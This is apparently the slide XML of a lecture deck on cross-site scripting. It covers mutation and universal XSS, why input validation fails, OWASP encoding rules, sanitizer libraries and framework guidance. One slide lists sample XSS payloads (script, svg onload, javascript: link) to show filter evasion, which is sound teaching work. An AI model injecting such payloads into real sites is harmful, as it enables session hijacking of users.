        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520965" y="6475859"/>
            <a:ext cx="8828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200" dirty="0"/>
              <a:t>https://owasp.org/www-community/Types_of_Cross-Site_Scripting</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="171923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34758"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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636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5D66F7-466A-41D8-9E8B-B21DFE769819}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502398" y="2473083"/>
            <a:ext cx="744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and for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XSS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nerds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among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1252B3-9888-4154-8E8B-815ACC0ADB4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502398" y="3494421"/>
            <a:ext cx="7357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  <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>there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two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special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types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01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755E0-FD81-4665-ADAB-6987A644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286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innerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – sets HTML in an element</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browsers modify (“fix”) it to prevent malformed code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in special cases, this modification changes benign string to effective payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>different browsers = different ways of modification</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>different anti-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> libraries = different ways of modification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212501"/>
            <a:ext cx="9339943" cy="24329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Have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discussed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>attacks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="6600" dirty="0" err="1"/>
              <a:t>which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instead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34399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D890A-320D-4936-B973-97896F4B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mXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (mutation-based) - 2019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0312E5A-AD81-4C17-8784-3AB329E7E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14" y="1447635"/>
            <a:ext cx="9715172" cy="21878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BB5D5C3-FFB1-4382-B7C6-ED2877D00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83" y="3859359"/>
            <a:ext cx="4637669" cy="171734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F207D87-BC7C-4A21-8636-199619A12DDC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238124" y="5251013"/>
            <a:ext cx="81701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https://www.youtube.com/watch?v=lG7U3fuNw3A</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://cure53.de/fp170.pdf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://hackinparis.com/data/slides/2013/slidesmarioheiderich.pdf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5098455D-214C-4A5B-9D5F-2EA049552F7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="238125" y="3979259"/>
            <a:ext cx="6215227" cy="1105285"/>
            <a:chOff x="238125" y="3979259"/>
            <a:chExt cx="6215227" cy="110528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E41CC3-A7BE-465D-B85C-E35840AD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125" y="3979259"/>
              <a:ext cx="6215227" cy="1105285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A8E2E40-C5E7-4B4D-BF63-D051F1788219}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3436883" y="3979259"/>
              <a:ext cx="1639614" cy="5717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5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CBB646-103D-41FE-B7DB-0F4CB664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uXSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> (universal XSS)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589D9D-2978-4D78-9900-975FAA13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vulnerabilities of browser or browser extension</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attacker gains control over all sessions in the browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>doesn’t depend on a vulnerable web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>previous publicly known cases (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exz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Adobe Acrobat extension for IE 6 and Mozilla</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>XSS Filter of IE 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Flash Player</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chrome for Android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05D52B-92BD-419C-B0B2-4813CDF41560}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536026" y="5846544"/>
            <a:ext cx="10731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https://www.acunetix.com/blog/articles/universal-cross-site-scripting-uxss/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://research.google/pubs/pub48028/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42162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6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D2443-D71C-4224-A6D2-2997F637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Validation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7958B-45DC-497F-9FD6-A98F1859E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Yes,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strict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possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>most</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>probably</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>that‘s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>enough</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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hundreds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possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>variations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>points</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>very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filter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> all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&gt;alert('XSS')&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>svg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=alert('XSS') /&gt;</a:t>
            </a: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 @error=this.alert('XSS')&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT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&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>('XSS')"&gt;XSS&lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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sz="2000" dirty="0"/>
              <a:t>https://portswigger.net/web-security/cross-site-scripting/cheat-sheet</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" sz="2000" dirty="0"/>
              <a:t>https://owasp.org/www-community/xss-filter-evasion-cheatsheet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62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depends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context</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>OWASP Cheat Sheet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>lists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> 12 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>rules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successful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>prevention</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1"/>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t> 4:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>#0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Never Insert Untrusted Data Except in Allowed Locations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2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#2 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#3 JavaScript Encode Before Inserting Untrusted Data into JavaScript</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     Data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8275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#0 Never Insert Untrusted Data Except in Allowed Locations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fr-FR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7C5054-3319-4342-960A-5E442E8F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05" y="2039006"/>
            <a:ext cx="3709345" cy="41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3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#1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML Encode Before Inserting Untrusted Data into HTML Element Content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Characters to encode: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fr-FR" dirty="0"/>
              <a:t>&amp; --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>amp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&lt; --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>lt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&gt; --&gt; &amp;gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>	" --&gt; &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>	' --&gt; &amp;#x27;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9C35D2-9660-453C-9CF0-5260888D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2" y="2648186"/>
            <a:ext cx="4066190" cy="6438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F8D5512-8EF1-495E-ABA5-4B4E0D98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57" y="2648186"/>
            <a:ext cx="3848429" cy="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9656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AT" dirty="0"/>
              <a:t>#2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attribute Encode Before Inserting Untrusted Data into HTML</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>     Common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sz="2600" dirty="0" err="1"/>
              <a:t>Encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>characters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>(excl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>) in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>„&amp;#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>xHH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>named</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>available</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="26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r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>Especially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unquoted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>attributes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>   [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0" err="1"/>
              <a:t>space</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="2600" dirty="0"/>
              <a:t>] % * + , - / ; &lt; = &gt; ^ and |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558635-1FC0-4AEE-B36C-C163AB06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57" y="1960753"/>
            <a:ext cx="5336737" cy="26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84D88-76C5-4472-83C1-22E67C73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Encoding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24661-8184-49C1-967B-3F931AEA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0428"/>
            <a:ext cx="11269717" cy="4726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/>
              <a:t>#3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JavaScript Encode Before Inserting Untrusted Data into JavaScript Data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de-DE" dirty="0" err="1"/>
              <a:t>Encode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>characters</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>(excl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>alphanumeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>) in</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>„\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>xHH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>“ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>format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4E9509-233B-400C-BF67-0D85E0734792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178676" y="6311900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03E69F-0CD0-4974-A335-E7A63ACD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1072"/>
            <a:ext cx="5714360" cy="24658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153FDF-BFA0-409B-8F6E-B3E74078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11" y="4601835"/>
            <a:ext cx="6595406" cy="8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EEF5-79A7-4004-AE05-34F7CB67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FE67B4-8696-45FB-8B3A-8286C349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220"/>
            <a:ext cx="10515600" cy="494537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.NET </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HtmlSanitizer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/mganss/HtmlSanitizer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OWASP Java HTML Sanitizer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://owasp.org/www-project-java-html-sanitizer/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Ruby on Rails </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>SanitizeHelper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://api.rubyonrails.org/classes/ActionView/Helpers/SanitizeHelper.html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Python Bleach</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://pypi.org/project/bleach/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PHP HTML Purifier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>http://htmlpurifier.org/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JavaScript / Node.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTML sanitizer (Google Closure Library)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/google/closure-library/blob/master/closure/goog/html/sanitizer/htmlsanitizer.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DOMPurify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>https://github.com/cure53/DOMPurify</a:t>
            </a:r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F26032-2A1B-44DF-BABC-8C8FC369C64A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="178676" y="6405799"/>
            <a:ext cx="12307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https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="60511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33CD717-313E-4C78-A53B-5FAA79CDE93D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2640985" y="2970422"/>
            <a:ext cx="6910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Let‘s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discuss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00FF00"/>
                </a:solidFill>
              </a:rPr>
              <a:t>few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more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68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199A4-DBBE-4FC8-8191-A56EFC0E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754F1F-6F67-4002-884D-423F226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3035"/>
            <a:ext cx="6090648" cy="1683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DBAAFDF-7358-41AE-872D-6BA75EACB02A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547488" y="23830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template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E358CD-E5C9-4776-B994-1F375DE65E2B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547488" y="4526920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https://angular.io/guide/security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B804EC5-9538-4194-87B4-D159A64CD2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45149" y="2560243"/>
            <a:ext cx="2176831" cy="1080637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BE12CAE-774C-4EE6-B459-16CC21E6A446}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8221980" y="2375577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completely escaped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7E79D1-A652-4E15-B872-0F9691D5050B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7569369" y="5095488"/>
            <a:ext cx="422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interprets HTML but not JavaScript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584904-79F0-4569-ACEC-8B7EFD46100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096000" y="4381500"/>
            <a:ext cx="1473369" cy="898654"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575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6AF5932F-82A1-4BD6-89FD-6048480F8273}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547488" y="5932102"/>
            <a:ext cx="792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functions like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>sanitizer.bypassSecurityTrustUrl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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126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568D7-1884-4D23-9D4B-D2BB8A0C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2460C2-D09C-4373-8FBF-2037BA25F659}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="547488" y="2383074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565BD4-9D9A-4A9C-8042-784FC3C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8" y="2752406"/>
            <a:ext cx="5248275" cy="2124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AA06D5F-8863-4270-AA3F-66EF92F296F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434340" y="4876481"/>
            <a:ext cx="7818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https://dev.to/spukas/preventing-xss-in-react-applications-5f5j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2E3438-C9F3-472C-B2DA-2C820B89B0C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="434340" y="5938199"/>
            <a:ext cx="657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careful with things like </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>dangerouslySetInnerHTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>={}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="261096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5E2D7-99B3-4D9C-98CD-216F1C58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libraries, frameworks and templates (correctly)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D3317A-6E90-4478-8908-28106AFE985A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
